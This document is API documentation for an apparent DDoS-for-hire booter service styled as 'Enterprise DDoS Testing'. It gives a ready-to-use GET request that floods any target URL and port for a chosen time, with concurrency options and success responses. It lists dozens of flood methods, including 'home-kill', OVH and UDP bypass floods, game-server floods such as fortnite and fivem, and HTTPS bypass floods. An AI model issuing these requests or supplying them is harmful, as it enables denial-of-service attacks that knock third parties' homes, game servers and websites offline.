Attack API Documentation
Enterprise DDoS Testing v2.0
Base URL
All API requests should be directed to the internal gateway:
http://api.striker.net/api/attack
Authentication
Credentials must be passed as URL query parameters. Token-based auth is currently restricted to Enterprise Tier.
- username: Your registered account ID
- password: Your secure API key/password
Launch Attack
Launches a stress test against the specified infrastructure.
Endpoint Definition
GET /api/attack?username={username}&password={password}&target={target}&port={port}&time={duration}&method={method}
Examples
// Standard Attack
GET /api/attack?username=user1&password=pass1&target=https://example.com&port=443&time=60&method=privflood
GET /api/attack?username=user1&password=pass1&target=https://example.com&port=443&time=60&method=privflood
// Multi-Concurrent (cons=3)
GET /api/attack?username=user1&password=pass1&target=https://example.com&port=443&time=60&method=privflood&cons=3
GET /api/attack?username=user1&password=pass1&target=https://example.com&port=443&time=60&method=privflood&cons=3
Response Format
Success Example
{
"status": "success",
"message": "Attack launched successfully",
"target": "https://example.com",
"port": 443,
"duration": 60,
"method": "privflood"
}
Error Example
{
"status": "error",
"message": "Error description"
}
Attack Methods
Layer 4 Methods
discord
udp-vse
udpbypass
udp-ts3
home-kill
tcp-tfo
tcpbypass
tcp-sockets
tcp-syn
tcp-amp
udp-raw
tcp-raw
ovh-raw
priv-ack
priv-dns
priv-tcp
priv-ovh
star-ack
star-dns
star-tcp
star-ovh
Layer 4 GAME Methods
fortnite
warzone
r6-kill
rocketleague
pubg
battlefield
fivem
Layer 7 Methods
http-raw
httpsbypass
privflood
browser
http-strike
Requirements & Limits
- Account must have API access enabled
- Duration must not exceed user's maximum time limit
- User must not exceed concurrent attack limit
- Target must not be blacklisted
- Port must be in valid range (1-65535)